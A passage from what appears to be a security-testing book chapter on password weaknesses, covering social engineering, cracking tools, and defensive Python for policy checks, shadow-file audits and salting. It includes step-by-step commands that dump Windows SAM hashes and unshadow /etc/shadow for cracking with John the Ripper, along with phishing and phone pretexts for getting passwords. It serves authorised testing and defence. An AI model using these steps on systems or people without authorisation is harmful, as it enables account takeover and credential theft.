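            aps.append((bssid, line.split(":", 1)[1].strip()))
    return aps


def reconcile(inventory, observed, must_be_present=("server room",)):
    """Devices that appeared (not in the register) and registered devices that went quiet."""
    known = {a.mac: a for a in inventory}
    unknown = {mac: ip for mac, ip in observed.items() if mac not in known}
    # A laptop that is switched off is not "missing"; only flag assets that should always answer.
    missing = [a for a in inventory if a.location in must_be_present and a.mac not in observed]
    return unknown, missing


def rogue_access_points(aps, authorised):
    """Evil twins (our SSID from a BSSID we don't own) and other unrecognised APs."""
    twins, others = [], []
    for bssid, ssid in aps:
        if bssid in authorised:
            continue
        (twins if ssid in authorised.values() else others).append((bssid, ssid))
    return twins, others


# Constructed asset register, ARP/neighbour table and wireless survey.
INVENTORY = [
    Asset("00:1b:21:3c:4d:5e", "core-switch-1", "server room"),
    Asset("00:1b:21:3c:4d:5f", "file-server", "server room"),
    Asset("00:1b:21:3c:4d:60", "backup-nas", "server room"),
    Asset("3c:97:0e:aa:bb:01", "alice-laptop", "floor 2"),
    Asset("3c:97:0e:aa:bb:02", "bob-laptop", "floor 2"),
]
AUTHORISED_APS = {"d8:c7:c8:11:22:33": "corp-wifi"}   # bssid -> ssid we broadcast
IP_NEIGH = [
    "10.0.0.1 dev eth0 lladdr 00:1b:21:3c:4d:5e REACHABLE",
    "10.0.0.5 dev eth0 lladdr 00:1B:21:3C:4D:5F STALE",
    "10.0.0.77 dev eth0 lladdr 3c:97:0e:aa:bb:01 REACHABLE",
    "10.0.0.91 dev eth0 lladdr 00:13:37:de:ad:01 REACHABLE",   # never inventoried
    "10.0.0.120 dev eth0  FAILED",
]
WIFI_SCAN = [
    "BSS d8:c7:c8:11:22:33(on wlan0)",
    "\tSSID: corp-wifi",
    "BSS 02:13:37:ca:fe:01(on wlan0)",
    "\tSSID: corp-wifi",            # our SSID from hardware we don't own
    "BSS a4:2b:8c:00:00:09(on wlan0)",
    "\tSSID: CoffeeShop-Guest",
]


def run_sample():
    unknown, missing = reconcile(INVENTORY, parse_ip_neigh(IP_NEIGH))
    twins, others = rogue_access_points(parse_wifi_scan(WIFI_SCAN), AUTHORISED_APS)
    return unknown, missing, twins, others


if __name__ == "__main__":
    unknown, missing, twins, others = run_sample()
    print("unknown devices:", unknown)
    print("quiet server-room assets:", [a.owner for a in missing])
    print("evil twins:", twins, "other APs:", others)
```

MAC addresses are trivially spoofed, so this catches the careless intruder and the forgotten drop box, not a determined one; treat a hit as a prompt to walk to the jack or the room, and pair the wired check with 802.1X on the switch ports.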
Passwords
In This Chapter
Identifying password vulnerabilities
Examining password-hacking tools and techniques
Hacking operating system passwords
Hacking password-protected files
Protecting your systems from password hacking
Password hacking is one of the easiest and most common ways attackers obtain unauthorized network, computer, or application access. You often hear about it in the headlines, and study after study such as the Verizon Data Breach Investigations Report reaffirms that weak passwords are at the root of many security problems. I have trouble wrapping my head around the fact that I’m still talking about (and businesses are suffering from) weak passwords, but it’s a reality—and, as an information security testing professional, you can certainly do your part to minimize the risks.
Although strong passwords—ideally, longer and stronger passphrases that are difficult to crack (or guess)—are easy to create and maintain, network administrators and users often neglect this. Therefore, passwords are one of the weakest links in the information security chain. Passwords rely on secrecy. After a password is compromised, its original owner isn’t the only person who can access the system with it. That’s when accountability goes out the window and bad things start happening.
External attackers and malicious insiders have many ways to obtain passwords. They can glean passwords simply by asking for them or by looking over the shoulders of users (shoulder surfing) while they type their passwords. Hackers can also obtain passwords from local computers by using password-cracking software. To obtain passwords from across a network, attackers can use remote cracking utilities, keyloggers, or network analyzers.
This chapter demonstrates how easily the bad guys can gather password information from your network and computer systems. I outline common password vulnerabilities and describe countermeasures to help prevent these vulnerabilities from being exploited on your systems. If you perform the tests and implement the countermeasures outlined in this chapter, you’ll be well on your way to securing your systems’ passwords.
Understanding Password Vulnerabilities
When you balance the cost of security and the value of the protected information, the combination of a user ID and a secret password is usually adequate. However, passwords give a false sense of security. The bad guys know this and attempt to crack passwords as a step toward breaking into computer systems.
One big problem with relying solely on passwords for security is that more than one person can know them. Sometimes, this is intentional; often, it’s not. The tough part is that there’s no way of knowing who, besides the password’s owner, knows a password.
Remember that knowing a password doesn’t make someone an authorized user.
Here are the two general types of password vulnerabilities:
Organizational or user vulnerabilities: This includes lack of password policies that are enforced within the organization and lack of security awareness on the part of users.
Technical vulnerabilities: This includes weak encryption methods and unsecure storage of passwords on computer systems.
I explore each of these classifications in more detail in the following sections.
Before computer networks and the Internet, the user’s physical environment was an additional layer of password security that actually worked pretty well. Now that most computers have network connectivity, that protection is gone. Refer to Chapter 7 for details on managing physical security in this age of networked computers and mobile devices.
Organizational password vulnerabilities
It’s human nature to want convenience, especially when it comes to remembering five, ten, and often dozens of passwords for work and daily life. This desire for convenience makes passwords one of the easiest barriers for an attacker to overcome. Almost 3 trillion (yes, trillion with a t and 12 zeros) eight-character password combinations are possible by using the 26 letters of the alphabet and the numerals 0 through 9. The keys to strong passwords are: 1) easy to remember and 2) difficult to crack. However, most people just focus on the easy-to-remember part. Users like to use such passwords as password, their login name, abc123, or no password at all! Don’t laugh; I’ve seen these blatant weaknesses and guarantee they’re on any given network this very moment.
Unless users are educated and reminded about using strong passwords, their passwords usually are
Easy to guess.
Seldom changed.
Reused for many security points. When bad guys crack one password, they can often access other systems with that same password and username.
Using the same password across multiple systems and websites is nothing but a breach waiting to happen. Everyone is guilty of it, but that doesn’t make it right. Do what you can to protect your own credentials and spread the word to your users about how this practice can get you into a real bind.
Written down in unsecure places. Generally, the more complex a password is, the more difficult it is to crack. However, when users create complex passwords, they’re more likely to write them down. External attackers and malicious insiders can find these passwords and use them against you and your business.
Technical password vulnerabilities
You can often find these serious technical vulnerabilities after exploiting organizational password vulnerabilities:
Weak password encryption schemes. Hackers can break weak password storage mechanisms by using cracking methods that I outline in this chapter. Many vendors and developers believe that passwords are safe as long as they don’t publish the source code for their encryption algorithms. Wrong! A persistent, patient attacker can usually crack this security by obscurity (a security measure that’s hidden from plain view but can be easily overcome) fairly quickly. After the code is cracked, it is distributed across the Internet and becomes public knowledge.
Password cracking utilities take advantage of weak password encryption. These utilities do the grunt work and can crack any password, given enough time and computing power.
Programs that store their passwords in memory, unsecured files, and easily accessed databases.
Unencrypted databases that provide direct access to sensitive information to anyone with database access, regardless of whether they have a business need to know.
User applications that display passwords on the screen while the user is typing.
The National Vulnerability Database (an index of computer vulnerabilities managed by the National Institute of Standards and Technology) currently identifies over 2,300 password-related vulnerabilities! You can search for these issues at http://nvd.nist.gov to find out how vulnerable some of your systems are from a technical perspective.
Cracking Passwords
Password cracking is one of the most enjoyable hacks for the bad guys. It fuels their sense of exploration and desire to figure out a problem. You might not have a burning desire to explore everyone’s passwords, but it helps to approach password cracking with this mindset. So where should you start testing the passwords on your systems? Generally, any user’s password works. After you obtain one password, you can often obtain others—including administrator or root passwords.
Administrator passwords are the pot of gold. With unauthorized administrative access, you (or a criminal hacker) can do virtually anything on the system. When looking for your organization’s password vulnerabilities, I recommend first trying to obtain the highest level of access possible (such as administrator) through the most discreet method possible. That’s often what the criminals do.
You can use low-tech ways and high-tech ways to exploit vulnerabilities to obtain passwords. For example, you can deceive users into divulging passwords over the telephone or simply observe what a user has written down on a piece of paper. Or you can capture passwords directly from a computer, over a network, and via the Internet with the tools covered in the following sections.
Cracking passwords the old-fashioned way
A hacker can use low-tech methods to crack passwords. These methods include using social engineering techniques such as phishing, shoulder surfing, and simply guessing passwords from information that he knows about the user.
Social engineering
The most popular low-tech method for gathering passwords is social engineering, which I cover in detail in Chapter 6. Social engineering takes advantage of the trusting nature of human beings to gain information that later can be used maliciously. A common social engineering technique is simply to con people into divulging their passwords. It sounds ridiculous, but it happens all the time.
Techniques
To obtain a password through social engineering, you just ask for it. For example, you can simply call a user and tell him that he has some important-looking e-mails stuck in the mail queue, and you need his password to log in and free them up. This is often how hackers and rogue insiders try to get the information!
Another way to get users to divulge their passwords is to send a phishing e-mail simply requesting that information. I have found that asking users to confirm their understanding and compliance with internal security policies by submitting their login credentials to a phishing website is all it takes. I cover e-mail phishing in greater detail in Chapter 6.
If users give you their passwords during your testing, make sure that those passwords are changed. An easy way to do this is to force password changes for all users through the Windows domain. You don’t want to be held accountable if something goes awry after the password has been disclosed.
A common weakness that can facilitate such social engineering is when staff members’ names, phone numbers, and e-mail addresses are posted on your company website. Social media sites such as LinkedIn, Facebook, and Twitter can also be used against a company because these sites can reveal employees’ names and contact information.
Countermeasures
User awareness and consistent security training are great defenses against social engineering. Security tools are a good fail-safe if they monitor for such e-mails and web browsing at the host level, network perimeter, or in the cloud. Train users to spot attacks (such as suspicious phone calls or deceitful phishing e-mails) and respond effectively. Their best response is not to give out any information and to alert the appropriate information security manager in the organization to see whether the inquiry is legitimate and whether a response is necessary. Oh, and take that staff directory off your website or at least remove IT staff members’ information.
Shoulder surfing
Shoulder surfing (the act of looking over someone’s shoulder to see what the person is typing) is an effective, low-tech password hack.
Techniques
To mount this attack, the bad guys must be near their victims and not look obvious. They simply collect the password by watching either the user’s keyboard or screen when the person logs in. An attacker with a good eye might even watch whether the user is glancing around his desk for either a reminder of the password or the password itself. Security cameras or a webcam can even be used for such attacks. Coffee shops and airplanes provide the ideal scenarios for shoulder surfing.
You can try shoulder surfing yourself. Simply walk around the office and perform random spot checks. Go to users’ desks and ask them to log in to their computers, the network, or even their e-mail applications. Just don’t tell them what you’re doing beforehand, or they might attempt to hide what they’re typing or where they’re looking for their password—two things that they should’ve been doing all along! Just be careful doing this and respect other people’s privacy.
Countermeasures
Encourage users to be aware of their surroundings and not to enter their passwords when they suspect that someone is looking over their shoulders. Instruct users that if they suspect someone is looking over their shoulders while they’re logging in, they should politely ask the person to look away or, when necessary, hurl an appropriate epithet to show the offender that the user is serious. It’s often easiest to just lean into the shoulder surfer’s line of sight to keep them from seeing any typing and/or the computer screen. 3M Privacy Filters (www.shop3m.com/3m-privacy-filters.html) work great as well yet, surprisingly, I rarely see them being used.
Inference
Inference is simply guessing passwords from information you know about users—such as their date of birth, favorite television show, or phone numbers. It sounds silly, but criminals often determine their victims’ passwords simply by guessing them!
The best defense against an inference attack is to educate users about creating secure passwords that don’t include information that can be associated with them. Outside of certain password complexity filters, it’s often not easy to enforce this practice with technical controls. So, you need a sound security policy and ongoing security awareness and training to remind users of the importance of secure password creation.
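The "password complexity filter" mentioned above can do more than count character classes: it can reject the inference-guessable and easy-to-guess choices described in this section. The following Python is an added example written for this edit, not code from the book; the blocklist, the user attributes and the substitution map are constructed for illustration, and the argument names are assumptions.

```python
import re
from datetime import date

# Constructed blocklist for illustration; a real deployment would load a large
# breached-password list in its place.
COMMON_PASSWORDS = {"password", "passwd", "abc123", "123456", "qwerty",
                    "letmein", "welcome", "iloveyou"}

# Undo the usual substitutions so "pa$$w0rd" is judged as "password".
LEET_MAP = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                          "7": "t", "$": "s", "@": "a", "!": "i"})


def normalize(text):
    return text.lower().translate(LEET_MAP)


def personal_fragments(username, full_name, birth_date, phone):
    """Strings an attacker could infer from a staff directory or social media.

    birth_date is an ISO string such as "1985-03-14"; phone is free-form text.
    """
    bday = date.fromisoformat(birth_date)
    frags = {username.lower(), str(bday.year), bday.strftime("%m%d"), bday.strftime("%d%m")}
    frags.update(part.lower() for part in re.split(r"\W+", full_name) if len(part) >= 3)
    digits = re.sub(r"\D", "", phone)
    if len(digits) >= 4:
        frags.update({digits, digits[-4:]})
    return sorted(frags)


def check_password(password, username, full_name, birth_date, phone, min_length=12):
    """Return the list of policy violations; an empty list means the password passes."""
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    forms = {password.lower(), normalize(password)}   # judge both the raw and the de-leeted form
    if forms & COMMON_PASSWORDS:
        problems.append("matches a commonly used password")
    for frag in personal_fragments(username, full_name, birth_date, phone):
        if any(frag in form for form in forms):
            problems.append(f"contains personal information ({frag!r})")
    if len(set(password)) <= 2:
        problems.append("too few distinct characters")
    return problems


if __name__ == "__main__":
    # Constructed sample user record.
    user = dict(username="jsmith", full_name="Jane Smith",
                birth_date="1985-03-14", phone="404-555-0199")
    for candidate in ("Smith1985!", "pa$$w0rd", "correct horse battery staple"):
        print(candidate, "->", check_password(candidate, **user) or "OK")
```

The check is applied at password-change time, where the directory already knows the user's name, login and contact details; it cannot enforce "don't reuse this elsewhere", which remains an awareness matter.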
Weak authentication
External attackers and malicious insiders can obtain—or simply avoid having to use—passwords by taking advantage of older or unsecured operating systems that don’t require passwords to log in. The same goes for a phone or tablet that isn’t configured to use passwords.
Bypassing authentication
On older operating systems (such as Windows 9x) that prompt for a password, you can press Esc on the keyboard to get right in. Okay, it’s hard to find any Windows 9x systems these days, but the same goes for any operating system—old or new—that’s configured to bypass the login screen. After you’re in, you can find other passwords stored in such places as dialup and VPN connections and screensavers. Such passwords can be cracked very easily using ElcomSoft’s Proactive System Password Recovery tool (www.elcomsoft.com/pspr.html) and Cain & Abel (www.oxid.it/cain.html). These weak systems can serve as trusted machines—meaning that people assume they’re secure—and provide good launching pads for network-based password attacks as well.
Countermeasures
The only true defense against weak authentication is to ensure your operating systems require a password upon boot. To eliminate this vulnerability, at least upgrade to Windows 7, if not Windows 10, or use the most recent versions of Linux or one of the various flavors of UNIX, including Mac OS X and Chrome OS.
Current authentication systems, such as Kerberos (which is used in newer versions of Windows) and directory services (such as Microsoft’s Active Directory), encrypt user passwords or don’t communicate the passwords across the network at all, which creates an extra layer of security.
Cracking passwords with high-tech tools
High-tech password cracking involves using a program that tries to guess a password by determining all possible password combinations. These high-tech methods are mostly automated after you access the computer and password database files.
The main password-cracking methods are dictionary attacks, brute-force attacks, and rainbow attacks. You find out how each of these work in the following sections.
Password-cracking software
You can try to crack your organization’s operating system and application passwords with various password-cracking tools:
Brutus (www.hoobie.net/brutus) cracks logons for HTTP, FTP, telnet, and more.
Cain & Abel (www.oxid.it/cain.html) cracks LM and NT LanManager (NTLM) hashes, Windows RDP passwords, Cisco IOS and PIX hashes, VNC passwords, RADIUS hashes, and lots more. (Hashes are cryptographic representations of passwords.)
ElcomSoft Distributed Password Recovery (www.elcomsoft.com/edpr.html) cracks Windows, Microsoft Office, PGP, Adobe, iTunes, and numerous other passwords in a distributed fashion using up to 10,000 networked computers at one time. Plus, this tool uses the same graphics processing unit (GPU) video acceleration as the ElcomSoft Wireless Auditor tool, which allows for cracking speeds up to 50 times faster. (I talk about the ElcomSoft Wireless Auditor tool in Chapter 10.)
ElcomSoft System Recovery (www.elcomsoft.com/esr.html) cracks or resets Windows user passwords, sets administrative rights, and resets password expirations all from a bootable CD. This is a great tool for demonstrating what can happen when laptop computers do not have full disk encryption.
John the Ripper (www.openwall.com/john) cracks hashed Linux/UNIX and Windows passwords.
ophcrack (http://ophcrack.sourceforge.net) cracks Windows user passwords using rainbow tables from a bootable CD. Rainbow tables are pre-calculated password hashes that can help speed up the cracking process by comparing these hashes with the hashes obtained from the specific passwords being tested.
Proactive Password Auditor (www.elcomsoft.com/ppa.html) runs brute-force, dictionary, and rainbow cracks against extracted LM and NTLM password hashes.
Proactive System Password Recovery (www.elcomsoft.com/pspr.html) recovers practically any locally stored Windows password, such as logon passwords, WEP/WPA passphrases, SYSKEY passwords, and RAS/dialup/VPN passwords.
pwdump3 (www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-vista-7) extracts Windows password hashes from the SAM (Security Accounts Manager) database.
RainbowCrack (http://project-rainbowcrack.com) cracks LanManager (LM) and MD5 hashes very quickly by using rainbow tables.
THC-Hydra (www.thc.org/thc-hydra) cracks logons for HTTP, FTP, IMAP, SMTP, VNC and many more.
Some of these tools require physical access to the systems you’re testing. You might be wondering what value that adds to password cracking. If a hacker can obtain physical access to your systems and password files, you have more than just basic information security problems to worry about, right? True, but this kind of access is entirely possible! What about a summer intern, a disgruntled employee, or an outside auditor with malicious intent? The mere risk of an unencrypted laptop being lost or stolen and falling into the hands of someone with ill intent should be reason enough.
To understand how the preceding password-cracking programs generally work, you first need to understand how passwords are encrypted. Passwords are typically encrypted when they’re stored on a computer, using an encryption or one-way hash algorithm, such as SHA2 or MD5. Hashed passwords are then represented as fixed-length encrypted strings that always represent the same passwords with exactly the same strings. These hashes are irreversible for all practical purposes, so, in theory, passwords can never be decrypted. Furthermore, certain passwords, such as those in Linux, have a random value called a salt added to them to create a degree of randomness. This prevents the same password used by two people from having the same hash value.
Password-cracking utilities take a set of known passwords and run them through a password-hashing algorithm. The resulting encrypted hashes are then compared at lightning speed to the password hashes extracted from the original password database. When a match is found between the newly generated hash and the hash in the original database, the password has been cracked. It’s that simple.
Other password-cracking programs simply attempt to log on using a predefined set of user IDs and passwords. This is how many dictionary-based cracking tools work, such as Brutus (www.hoobie.net/brutus) and SQLPing3 (www.sqlsecurity.com/downloads). I cover cracking web application and database passwords in Chapters 15 and 16.
Passwords that are subjected to cracking tools eventually lose. You have access to the same tools as the bad guys. These tools can be used for both legitimate security assessments and malicious attacks. You want to find password weaknesses before the bad guys do, and in this section, I show you some of my favorite methods for assessing Windows and Linux/UNIX passwords.
When trying to crack passwords, the associated user accounts might be locked out, which could interrupt your users. Be careful if intruder lockout is enabled in your operating systems, databases, or applications. If lockout is enabled, you might lock out some or all computer/network accounts, resulting in a denial of service situation for your users.
Password storage locations vary by operating system:
Windows usually stores passwords in these locations:
Security Accounts Manager (SAM) database (c:\windows\system32\config)
Active Directory database file that’s stored locally or spread across domain controllers (ntds.dit)
Windows may also store passwords in a backup of the SAM file in the c:\winnt\repair or c:\windows\repair directory.
Some Windows applications store passwords in the Registry or as plain-text files on the hard drive! A simple registry or file-system search for “password” may uncover just what you’re looking for.
Linux and other UNIX variants typically store passwords in these files:
/etc/passwd (readable by everyone)
/etc/shadow (accessible by the system and the root account only)
/etc/security/passwd (accessible by the system and the root account only)
/.secure/etc/passwd (accessible by the system and the root account only)
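Before running a cracker against /etc/shadow, the quickest check a defender can make is whether the file itself is in order: which accounts have an empty password field, and which still use a hash algorithm that is weak by today's standards (the "weak password encryption schemes" listed earlier). The following Python is an added example, not code from the book; the shadow lines are constructed with made-up hash bodies, and the classification table reflects the `$id$` prefixes used by the crypt(3) family.

```python
import re

# crypt(3) hash prefix -> (algorithm name, considered weak today?)
HASH_PREFIXES = {
    "$1$": ("md5crypt", True),
    "$2a$": ("bcrypt", False), "$2b$": ("bcrypt", False), "$2y$": ("bcrypt", False),
    "$5$": ("sha256crypt", False),
    "$6$": ("sha512crypt", False),
    "$7$": ("scrypt", False),
    "$y$": ("yescrypt", False),
}


def classify_hash(field):
    """Return (algorithm, weak, locked) for one shadow password field."""
    if field == "":
        return ("none", True, False)            # empty field: login with no password at all
    locked = field.startswith(("!", "*"))
    core = field.lstrip("!*")                   # "!$6$..." is a locked account that keeps its hash
    if core == "":
        return ("none", False, True)            # "*" or "!!": no password set, password login disabled
    for prefix, (name, weak) in HASH_PREFIXES.items():
        if core.startswith(prefix):
            return (name, weak, locked)
    if re.fullmatch(r"[./0-9A-Za-z]{13}", core):
        return ("descrypt", True, locked)       # traditional DES crypt: 8 significant characters, no $id$
    return ("unknown", True, locked)


def audit_shadow(text):
    """Return (line number, user, finding) for every enabled account that needs attention."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            findings.append((lineno, "?", "malformed line"))
            continue
        user, pw_field = fields[0], fields[1]
        algo, weak, locked = classify_hash(pw_field)
        if locked:
            continue                            # cannot log in with a password; nothing to crack
        if algo == "none":
            findings.append((lineno, user, "empty password field: login without a password"))
        elif weak:
            findings.append((lineno, user, f"weak hash algorithm {algo}"))
    return findings


# Constructed /etc/shadow excerpt; the hash bodies are made up and not valid hashes.
SAMPLE_SHADOW = """\
root:$6$c0nstructedS4lt$Zt5hQ8k1uY3bX9wL2mN7pR4sT6vA8cE0gI2kM4oQ6sU8wY0aC2eG4iK6mO8qS0uW2y:19000:0:365:7:::
alice:$y$j9T$c0nstructedS4lt$Q8k1uY3bX9wL2mN7pR4sT6vA8cE0gI2kM4oQ6sU8wY0:19000:0:365:7:::
bob:$1$c0nstru$Xv1c.VqYSi7eCQ0sj1M3z1:18000:0:99999:7:::
legacy:Npge08pfz4wuk:17000:0:99999:7:::
guest::19000:0:99999:7:::
svc-backup:!$6$c0nstructedS4lt$Zt5hQ8k1uY3bX9wL2mN7pR4sT6vA8cE0gI2kM4oQ6sU8wY0aC2eG4iK6mO8qS0uW2y:19000:0:365:7:::
daemon:*:19000:0:99999:7:::
"""

if __name__ == "__main__":
    for lineno, user, finding in audit_shadow(SAMPLE_SHADOW):
        print(f"line {lineno}: {user}: {finding}")
```

Run it as root against the real file (`audit_shadow(open("/etc/shadow").read())`); accounts that come back as md5crypt or descrypt will be re-hashed with the current default the next time the user changes the password, which is one more reason to force a change after an audit.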
Dictionary attacks
Dictionary attacks quickly compare a set of known dictionary-type words—including many common passwords—against a password database. This database is a text file with hundreds if not thousands of dictionary words typically listed in alphabetical order. For instance, suppose that you have a dictionary file that you downloaded from one of the sites in the following list. The English dictionary file at the Purdue site contains one word per line starting with 10th, 1st… all the way to zygote.
Many password-cracking utilities can use a separate dictionary that you create or download from the Internet. Here are some popular sites that house dictionary files and other miscellaneous word lists:
ftp://ftp.cerias.purdue.edu/pub/dict
www.outpost9.com/files/WordLists.html
Don’t forget to use other language files as well, such as Spanish and Klingon.
Dictionary attacks are only as good as the dictionary files you supply to your password-cracking program. You can easily spend days, even weeks, trying to crack passwords with a dictionary attack. If you don’t set a time limit or similar expectation going in, you’ll likely find that dictionary cracking is often a mere exercise in futility. Most dictionary attacks are good for weak (easily-guessed) passwords. However, some special dictionaries have common misspellings or alternative spellings of words, such as pa$$w0rd (password) and 5ecur1ty (security). Additionally, special dictionaries can contain non-English words and thematic words from religions, politics, or Star Trek.
Brute-force attacks
Brute-force attacks can crack practically any password, given sufficient time. Brute-force attacks try every combination of numbers, letters, and special characters until the password is discovered. Many password-cracking utilities let you specify such testing criteria as the character sets, password length to try, and known characters (for a “mask” attack). Sample Proactive Password Auditor brute-force password-cracking options are shown in Figure 8-1.
Figure 8-1: Brute-force password-cracking options in Proactive Password Auditor.
A brute-force test can take quite a while, depending on the number of accounts, their associated password complexities, and the speed of the computer that’s running the cracking software. As powerful as brute-force testing can be, it literally can take forever to exhaust all possible password combinations, which in reality is not practical in every situation.
Smart hackers attempt logins slowly or at random times so the failed login attempts aren’t as predictable or obvious in the system log files. Some malicious users might even call the IT help desk to attempt a reset of the account they just locked out. This social engineering technique could be a major issue, especially if the organization has no (or minimal) mechanisms in place to verify that locked-out users are who they say they are.
Can an expiring password deter a hacker’s attack and render password cracking software useless? Yes. After the password is changed, the cracking must start again if the hacker wants to test all the possible combinations. This is one reason why it’s a good idea to change passwords periodically. Still, I’m not a big fan of forcing users to change their passwords often. Shortening the change interval can reduce the risk of passwords being cracked but can also be politically unfavorable in your business and end up creating the opposite effect you’re going for. You have to strike a balance between security and convenience and usability. In many situations, I don’t think it’s unreasonable to require password changes every 6 to 12 months or after a suspected compromise.
Exhaustive password cracking attempts usually aren’t necessary. Most passwords are fairly weak. Even minimum password requirements, such as a password length, can help you in your testing. You might be able to discover security policy information by using other tools or via your web browser. (See Part IV for tools and techniques for testing the security of operating systems. See Chapter 15 for information on testing websites/applications.) If you find this password policy information, you can configure your cracking programs with more well-defined cracking parameters, which often generate faster results.
Rainbow attacks
A rainbow password attack uses rainbow cracking to crack various password hashes for LM, NTLM, Cisco PIX, and MD5 much more quickly and with extremely high success rates (near 100 percent). Password cracking speed is increased in a rainbow attack because the hashes are precalculated and thus don’t have to be generated individually on the fly as they are with dictionary and brute-force cracking methods.
Unlike dictionary and brute-force attacks, rainbow attacks cannot be used to crack password hashes of unlimited length. The current maximum length for Microsoft LM hashes is 14 characters, and the maximum is up to 16 characters (dictionary-based) for Windows Vista and 7 hashes (also known as NT hashes). The rainbow tables are available for purchase and download via the ophcrack site at http://ophcrack.sourceforge.net. There’s a length limitation because it takes significant time to generate these rainbow tables. Given enough time, a sufficient number of tables will be created. Of course, by then, computers and applications likely have different authentication mechanisms and hashing standards—including a new set of vulnerabilities—to contend with. Job security for IT professionals working in this area never ceases to grow.
If you have a good set of rainbow tables, such as those offered via the ophcrack site and Project RainbowCrack (http://project-rainbowcrack.com), you can crack passwords in seconds, minutes, or hours versus the days, weeks, or even years required by dictionary and brute-force methods.
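Two points made in this section, the hash-and-compare principle behind cracking tools (and the salt that Linux adds to each record) and the precomputation that makes rainbow attacks fast, can be shown together in a few lines. The Python below is an added example, not code from the book or from any of the tools named above: it precomputes a plain hash-to-password lookup table (the simplest form of the idea; real rainbow tables compress the table into hash chains) and shows that a per-user random salt makes the same table useless, while a slow KDF (PBKDF2 via `hashlib`) raises the cost of each guess. The word list and user records are constructed.

```python
import hashlib
import os

# Constructed stand-in for a dictionary file (one candidate password per entry).
WORDLIST = ["123456", "password", "letmein", "qwerty", "dragon", "zygote"]


def unsalted_hash(password):
    """Plain SHA-256 of the password: identical passwords give identical hashes."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password, salt):
    """SHA-256 over salt || password, stored as 'salthex$digest' so a verifier can
    recompute it. The salt is not secret; its job is to make every record unique."""
    digest = hashlib.sha256(salt + password.encode()).hexdigest()
    return f"{salt.hex()}${digest}"


def slow_salted_hash(password, salt, iterations=600_000):
    """Same idea with PBKDF2-HMAC-SHA256, so each guess costs `iterations` HMAC calls."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()
    return f"{iterations}${salt.hex()}${digest}"


def verify_slow(password, stored):
    iters, salt_hex, _ = stored.split("$")
    return slow_salted_hash(password, bytes.fromhex(salt_hex), int(iters)) == stored


def build_lookup_table(words):
    """Precompute hash -> password once and reuse it against any number of stolen hashes.
    This is the principle behind rainbow tables; the plain lookup form is enough to
    show why salting defeats precomputation."""
    return {unsalted_hash(w): w for w in words}


def demo():
    table = build_lookup_table(WORDLIST)

    # Two users chose the same weak password and the system stores it unsalted.
    unsalted_db = {"alice": unsalted_hash("letmein"), "bob": unsalted_hash("letmein")}
    same_hash = unsalted_db["alice"] == unsalted_db["bob"]
    hits = {user: table.get(h) for user, h in unsalted_db.items()}   # both recovered instantly

    # Same password, but each record gets its own 16-byte random salt.
    salted_db = {user: salted_hash("letmein", os.urandom(16)) for user in ("alice", "bob")}
    distinct = salted_db["alice"] != salted_db["bob"]
    salted_hits = {user: table.get(s.split("$")[1]) for user, s in salted_db.items()}  # no hits

    return {"same_unsalted_hash": same_hash, "table_hits": hits,
            "distinct_salted_hashes": distinct, "table_hits_salted": salted_hits}


if __name__ == "__main__":
    print(demo())
```

Salting does not stop guessing; it only forces the attacker to hash each candidate once per salt instead of once for everyone, which is exactly the reuse a precomputed table depends on. The iteration count in `slow_salted_hash` is the defender's knob for how much each of those per-salt guesses costs.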
Cracking Windows passwords with pwdump3 and John the Ripper
The following steps use two of my favorite utilities to test the security of current passwords on Windows systems:
pwdump3 (to extract password hashes from the Windows SAM database)
John the Ripper (to crack the hashes of Windows and Linux/UNIX passwords)
The following test requires administrative access to either your Windows standalone workstation or the server:
1. Create a new directory called passwords from the root of your Windows C: drive.
2. Download and install a decompression tool if you don’t already have one.
WinZip (www.winzip.com) is a good commercial tool I use and 7-Zip (www.7-zip.org) is a free decompression tool. Windows also includes built-in Zip file handling, albeit a bit kludgy.
3. Download, extract, and install the following software into the passwords directory you created, if you don’t already have it on your system:
pwdump3: Download the file from www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-vista-7.
John the Ripper: Download the file from www.openwall.com/john.
4. Enter the following command to run pwdump3 and redirect its output to a file called cracked.txt:
c:\passwords\pwdump3 > cracked.txt
This file captures the Windows SAM password hashes that are cracked with John the Ripper. Figure 8-2 shows the contents of the cracked.txt file that contains the local Windows SAM database password hashes.
5. Enter the following command to run John the Ripper against the Windows SAM password hashes to display the cracked passwords:
c:\passwords\john cracked.txt
This process—shown in Figure 8-3—can take seconds or days, depending on the number of users and the complexity of their associated passwords. My Windows example took only five seconds to crack five weak passwords.
Figure 8-2: Output from pwdump3.
Figure 8-3: Cracked password file hashes using John the Ripper.
Cracking UNIX/Linux passwords with John the Ripper
John the Ripper can also crack UNIX/Linux passwords. You need root access to your system and to the password (/etc/passwd) and shadow password (/etc/shadow) files. Perform the following steps for cracking UNIX/Linux passwords:
1. Download the UNIX source files from www.openwall.com/john.
2. Extract the program by entering the following command:
[root@localhost kbeaver]# tar -xf john-1.8.0.tar.xz
or whatever the current file name is. (GNU tar detects the compression format from the file, so the same command works for the .tar.gz release; the -z option applies only to gzip archives.)
You can also crack UNIX or Linux passwords on a Windows system by using the Windows/DOS version of John the Ripper.
3. Change to the /src directory that was created when you extracted the program and enter the following command:
make generic
4. Change to the /run directory and enter the following command to use the unshadow program to combine the passwd and shadow files and copy them to the file cracked.txt:
./unshadow /etc/passwd /etc/shadow > cracked.txt
The unshadow process won’t work with all UNIX variants.
5. Enter the following command to start the cracking process:
./john cracked.txt
When John the Ripper is complete (and this could take some time), the output is similar to the results of the preceding Windows process. (Refer to Figure 8-3.)
After completing the preceding Windows or UNIX steps, you can either force users to change passwords that don’t meet specific password policy requirements, you can create a new password policy, or you can use the information to update your security awareness program. Just do something.
Be careful handling the results of your password cracking efforts. You create an accountability issue because more than one person now knows the passwords. Always treat the password information of others as strictly confidential. If you end up storing them on your test system, make sure it’s extra secure. If it’s a laptop, encrypting the hard drive is the best defense.
Passwords by the numbers
